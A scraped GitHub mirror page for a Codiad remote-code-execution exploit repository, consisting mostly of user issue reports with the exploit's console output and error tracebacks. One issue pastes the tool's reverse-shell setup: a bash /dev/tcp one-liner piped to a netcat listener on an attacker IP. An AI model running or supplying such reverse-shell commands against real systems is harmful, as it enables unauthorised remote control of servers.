wangyihang / codiad-remote-code-execute-exploit Goto Github PK
View Code? Open in Web Editor NEWA simple exploit to execute system command on codiad
codiad-remote-code-execute-exploit's People
Contributors
Stargazers
Watchers
Forkers
5up3rc vf3ng selfevo i0n0n 8r1zzly mhaskar wifido jijicanyu magma2 a3iodun j4c0814n dorkwiz c0010 sriramoffcl keystroke95 ashr imulmul dotter100 luckypi zabogdan sung3r andrewrisorto fdlucifer cyberjunnkie digipenguin isrvb moshe-co mushfiqur47 jesusgavancho alien-kericcodiad-remote-code-execute-exploit's Issues
SSL Error
root@kali:~/Desktop/Codiad-Remote-Code-Execute-Exploit# python exploit.py https://192.168.x.x/development admin admin 192.168.y.y 8888 windows
[+] Please execute the following command on your vps:
nc -lnvp 8888
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
Traceback (most recent call last):
File "exploit.py", line 160, in <module>
main()
File "exploit.py", line 143, in main
if not login(domain, username, password):
File "exploit.py", line 20, in login
response = session.post(url, data=data)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 555, in post
return self.request('POST', url, data=data, json=json, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 508, in request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 618, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 506, in send
raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='192.168.x.x', port=443): Max retries exceeded with url: /webdevelopment/components/user/controller.php?action=authenticate (Caused by SSLError(SSLError(1, u'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)'),))
What causes this issue?
error while trying the code
Good morning, Wang
I tried your code with one of my CTF machine and this is the error that got:
[Y/n]Y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : <head>
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code 404.
<p>Message: File not found.
<p>Error code explanation: 404 = Nothing matches the given URI.
</body>
Traceback (most recent call last):
File "exploit.py", line 88, in <module>
main()
File "exploit.py", line 76, in main
path = get_write_able_path()
File "exploit.py", line 32, in get_write_able_path
json_obj = json.loads(content)
File "/usr/lib/python2.7/json/__init__.py", line 339, in loads
return _default_decoder.decode(s)
File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
Before this, when i tried it this afternoon, all i got is the reverse shell to my own machine, which is weird.
I tested the CTF box with default admin/admin password and it let me in. However, i could not push further than that. Would you mind tell me what the errors above mean?
Sincerely,
Peter
error on class.filemanager.php line 208
Hey man - Im coming up against this issue at the moment, any ideas
<b>Notice</b>: Undefined index: type in <b>C:\xampp\htdocs\development\components\filemanager\class.filemanager.php</b> on line <b>208</b><br />
Error Sending Payload
I can't get a reverse shell
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...
{"status":"error","message":"No Results Returned"}
[+] Exploit finished!
[+] Enjoy your reverse shell!
Error while Intial setup
An Error Occoured<br><br>No Read/Write Permission
Error displayed while initializing the project
how could i give permission to access the files in /home/
Payload Issue? {"status":"error","message":"No Results Returned"}
Running the script and I get the following (with no reverse shell) ....
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"test","path":"files"}}
[+] Writeable Path : files
[+] Sending payload...
{"status":"error","message":"No Results Returned"}
[+] Exploit finished!
[+] Enjoy your reverse shell!
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.